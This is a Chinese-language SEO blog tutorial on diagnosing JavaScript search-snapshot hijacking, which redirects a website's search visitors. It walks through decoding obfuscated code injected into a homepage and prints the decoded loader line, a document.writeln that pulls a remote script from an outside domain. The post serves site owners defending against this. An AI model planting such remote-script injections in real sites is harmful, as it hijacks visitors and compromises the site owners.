網站JS快照被劫持恢複診斷教程

站長們經常遇到js快照劫持的問題,對網站的優化帶來及大的影響。對於大多數新手站長來說js快照劫持,束手無策。今天無憂老師為大家進行一輪深度的解析。

網站JS快照被劫持恢複診斷教程

一,js快照劫持示例

js快照劫持演示圖,記錄了是網站跳轉的。

一個是百度搜尋快照劫持演示。另一個是搜狐搜尋快照劫持演示。

網站JS快照被劫持恢複診斷教程

JS快照劫持,百度搜尋演示圖

網站JS快照被劫持恢複診斷教程

JS快照劫持,搜狐搜尋演示圖

 

二,分析js快照劫持代碼

經分析,網站首頁被植入了惡意了代碼,而且是多次加密JS代碼。

網站JS快照被劫持恢複診斷教程

此段代碼就是添加在網站首頁的JS,而且屬於了加密了的代碼,一般看不出什麼貓膩。

三,加密JS層層分析

接下來進行JS反向解析分析。可以使用站長工具在線分析:http://tool.chinaz.com/js.aspx

網站JS快照被劫持恢複診斷教程

站長工具JS混淆加密壓縮 截圖

解析後,可以看到真面目,這段代碼。

< script type = “text/javascript” >
document.writeln(“<script src=http://www.5121188.com/main2.js></script>”); < /script>

打開這個main2.js可以看到一段落代碼。

網站JS快照被劫持恢複診斷教程

JS惡意代碼二次加密

攻擊者真的多有精力,層層加密啊。怪不得一般站長根本無法發現。

然後再進行解密。

網站JS快照被劫持恢複診斷教程

被加密的JS惡意代碼解析圖

這下大家應該清楚了,攻擊者對代碼進行了3次的加密再調用,來實現百度快照的JS劫持跳轉。

 

四,網站安全建議

網站安全一直是一個讓站長運營者頭痛的問題,沒有百分百安全的網站,只有一斷的進行維護和優化,做到定期備份,定期檢查,最大程度的杜絕網站被黑被劫持的風險。希望各位站長清楚並且牢記在心。

如果想要?我把整個JS快照劫持代碼分析給大家,關注微信wuyouseo獲取。

 

最後,在我的課程中也經常會分享一些網站安全小知識,請大家一定關注我的SEO博客,不斷的分析乾貨教程和文章。

 

文章由SEO技術博客 無憂老師分享,轉載請註明出處。

發表迴響